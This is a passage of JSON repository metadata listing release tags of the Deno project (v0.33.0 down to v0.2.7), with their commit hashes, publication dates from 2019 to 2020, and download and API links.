:"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7"